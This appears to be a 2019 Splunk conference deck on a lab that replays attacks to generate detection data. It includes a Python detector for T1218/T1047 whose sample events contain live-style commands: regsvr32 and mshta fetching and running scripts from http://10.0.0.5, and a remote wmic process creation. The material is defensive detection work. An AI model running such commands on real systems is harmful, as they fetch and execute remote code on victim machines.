SEC1671: Attack Range / Splunk SIEMulator, Splunk .conf19
© 2019 SPLUNK INC.
Use Splunk SIEMulator to Generate Data for Automated Detection, Investigation, and Response
Rod Soto + Phil Royer
Splunk Security Research
Forward-Looking Statements
During the course of this presentation, we may make forward-looking statements regarding future events or plans of the company. We caution you that such statements reflect our current expectations and estimates based on factors currently known to us and that actual events or results may differ materially. The forward-looking statements made in this presentation are being made as of the time and date of its live presentation. If reviewed after its live presentation, it may not contain current or accurate information. We do not assume any obligation to update any forward-looking statements made herein.
In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only, and shall not be incorporated into any contract or other commitment. Splunk undertakes no obligation either to develop the features or functionalities described or to include any such feature or functionality in a future release.
Splunk, Splunk>, Turn Data Into Doing, The Engine for Machine Data, Splunk Cloud, Splunk Light and SPL are trademarks and registered trademarks of Splunk Inc. in the United States and other countries. All other brand names, product names, or trademarks belong to their respective owners. © 2019 Splunk Inc. All rights reserved.
Phil Royer, Research Engineer
Rod Soto, Principal Security Researcher
The Problem with a Lack of Data
• Defenders are always catching up to the latest crimeware and exploit code
• The exploit/bug market has made obtaining samples more difficult
• There is no common framework for sharing data
• What data exists is divided into pieces (exploitation, detection, pcaps/logs)
• Most enterprises cannot afford a dedicated team of specialists to replicate or recreate specialized data
Industry Limitations
• No standard framework for sharing data
• A market driven by keeping data proprietary or charging for it
• Data shared in several pieces, puzzle/Jeopardy style
• Replicating exploits is still seen as breaking the rules, or as out of scope, in many corporate defensive environments
• There is no single framework that puts all the pieces together...
Challenges in Data Replication
Where does data come from?
• 0days, Twitter, disclosure lists, Exploit-DB, industry reports, security groups, internal research, GitHub
How do we replicate and measure?
• Exploit-DB, GitHub, adversarial simulation (Caldera, FireDrill, Red Canary's Atomic Red Team, Metasploit)
How do we build countermeasures?
• Snort signatures, Splunk searches (investigation/detection), Phantom playbooks
Enter Splunk SIEMulator
• Project based on Chris Long's DetectionLab (https://github.com/clong/DetectionLab)
• Used to feed attack data into Splunk
• Seeks to replicate attacks, generate data, and build countermeasures in a single framework
• Infrastructure as Code allows continuous integration, quick deployment, cloud storage, and elasticity
SIEMulator IaC
Attack Replication
SIEMulator Architecture Overview
• Windows target infrastructure: a Domain Controller and a Windows 10 workstation
• AttackIQ FireDrill runs simulated attacks against the targets and reports red team telemetry
• Forwarders on the targets send logs and events to Splunk ES
• Splunk ES turns detections into notable events
• Phantom consumes the notable events for investigation and response
Example
Attack Range Setup
AttackIQ Web Interface (T1218/T1047)
Attack Recorded in Splunk (T1218/T1047)
Translating Data into the Defensive Context
Splunk ES Detection Search (T1218/T1047)
Applying This Data
Splunk Alert
Applying This Data - Investigation Searches
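The detection step of the walkthrough above appears on the slides only as screenshots of the Enterprise Security search and alert, and the architecture slide only names the pieces (forwarded Windows events in, notable events out). The following is an added example, not code from the deck or from the attack_range project, that mirrors that step in Python: it parses a handful of constructed, Sysmon-style process-creation events of the kind the forwarders ship to Splunk and applies narrow rules for T1218 (signed binary proxy execution through regsvr32, mshta and rundll32) and T1047 (process creation through WMI). The key=value event layout, host names, user names, IP addresses and command lines are all made up for this example; the field names follow Sysmon's (Image, ParentImage, CommandLine).

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Constructed, Sysmon-like process-creation events (Event ID 1) flattened to
# key=value form, roughly as a forwarder would deliver them to Splunk. These
# are made-up sample lines, not telemetry captured from the Attack Range.
SAMPLE_EVENTS = r'''
EventCode=1 Computer=win10-01 User="CORP\alice" Image="C:\Windows\explorer.exe" ParentImage="C:\Windows\System32\userinit.exe" CommandLine="C:\Windows\explorer.exe"
EventCode=1 Computer=win10-01 User="CORP\alice" Image="C:\Windows\System32\rundll32.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="rundll32.exe shell32.dll,Control_RunDLL desk.cpl"
EventCode=1 Computer=win10-01 User="CORP\alice" Image="C:\Windows\System32\regsvr32.exe" ParentImage="C:\Windows\System32\cmd.exe" CommandLine="regsvr32.exe /s /n /u /i:http://10.0.0.5/payload.sct scrobj.dll"
EventCode=1 Computer=win10-01 User="CORP\alice" Image="C:\Windows\System32\mshta.exe" ParentImage="C:\Windows\System32\cmd.exe" CommandLine="mshta.exe javascript:a=GetObject('script:http://10.0.0.5/x.sct').Exec();close()"
EventCode=1 Computer=win10-01 User="CORP\alice" Image="C:\Windows\System32\wbem\WMIC.exe" ParentImage="C:\Windows\System32\cmd.exe" CommandLine="wmic.exe /node:dc01 process call create \"cmd.exe /c whoami\""
EventCode=1 Computer=dc01 User="NT AUTHORITY\SYSTEM" Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\System32\wbem\WmiPrvSE.exe" CommandLine="cmd.exe /c whoami"
'''

# key=value pairs; a value may be double-quoted and contain \" escapes.
KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# Paths a signed Windows binary should not normally be loading code from.
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata)\\", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value line into a dict, unquoting quoted values."""
    event: Dict[str, str] = {}
    for key, raw in KV.findall(line):
        if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
            raw = raw[1:-1].replace('\\"', '"')
        event[key] = raw
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, for image comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    technique: str
    host: str
    user: str
    image: str
    command_line: str
    reason: str


def check_t1218(ev: Dict[str, str]) -> Optional[str]:
    """T1218: trusted, signed binaries used as a proxy to run attacker code."""
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()
    if image == "regsvr32.exe" and ("/i:http" in low or "scrobj.dll" in low):
        return "regsvr32 loading a scriptlet over HTTP (Squiblydoo-style)"
    if image == "mshta.exe" and any(
            t in low for t in ("javascript:", "vbscript:", "http://", "https://")):
        return "mshta executing inline script or a remote HTA"
    if image == "rundll32.exe" and ("javascript:" in low or USER_WRITABLE.search(cmd)):
        return "rundll32 running inline script or a DLL from a user-writable path"
    return None


def check_t1047(ev: Dict[str, str]) -> Optional[str]:
    """T1047: process creation through WMI, locally or on a remote node."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    low = ev.get("CommandLine", "").lower()
    if image == "wmic.exe" and re.search(r"process\s+call\s+create", low):
        return "wmic 'process call create' launching a process"
    if parent == "wmiprvse.exe":
        return "process spawned by the WMI provider host"
    return None


RULES = (("T1218", check_t1218), ("T1047", check_t1047))


def detect(lines: Iterable[str]) -> List[Finding]:
    """Run every rule over every process-creation event; one Finding per hit."""
    findings: List[Finding] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = parse_event(line)
        if ev.get("EventCode") != "1":
            continue
        for technique, check in RULES:
            reason = check(ev)
            if reason:
                findings.append(Finding(technique, ev.get("Computer", "?"), ev.get("User", "?"),
                                        ev.get("Image", "?"), ev.get("CommandLine", ""), reason))
    return findings


def technique_counts(findings: List[Finding]) -> Dict[str, int]:
    """Per-technique tally, the equivalent of `stats count by technique`."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS.splitlines())
    for f in hits:
        print(f"{f.technique} {f.host} {f.user} {basename(f.image)}: {f.reason}")
    print(technique_counts(hits))
```

Running the script prints one line per finding (regsvr32 and mshta for T1218, wmic and the cmd.exe child of WmiPrvSE.exe for T1047) and a per-technique count; the benign explorer.exe and rundll32.exe control-panel lines do not fire. In the pipeline the deck describes, the same logic lives in an ES correlation search over forwarded events and each hit becomes a notable event that Phantom can pick up. Rules this narrow are tuned for a lab: in production the WmiPrvSE.exe parent rule in particular needs a baseline, because management tooling legitimately spawns processes through WMI.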
Applying This Process
• By applying this process we cover the entire cycle: replicating known and new exploits, recording the data, and applying Splunk technology for detection, investigation, and defense.
• We can now streamline the production of new content and tackle new threats faster.
• We can now share this knowledge via content updates, by publishing searches, playbooks, and apps, or by modifying current content.
• Future work will include integration with other adversarial simulation frameworks.
Content Production via ESCU
Splunk Security Research Team
The Security Research Team is devoted to delivering actionable intelligence to Splunk's customers in an unceasing effort to safeguard them against modern enterprise risks. Composed of elite researchers, engineers, and consultants who have served in both public and private sector organizations, this innovative team of digital defenders monitors emerging cybercrime trends and techniques, then translates them into practical analytics that Splunk users can operationalize within their environments. Download Splunk Enterprise Security Content Update in Splunkbase to learn more.
https://github.com/splunk/attack_range (note the underscore in the repository name)
RATE THIS SESSION
Go to the .conf19 mobile app to
Thank You!
Q&A
Rod Soto | Security Researcher
Philip Royer | Security Researcher
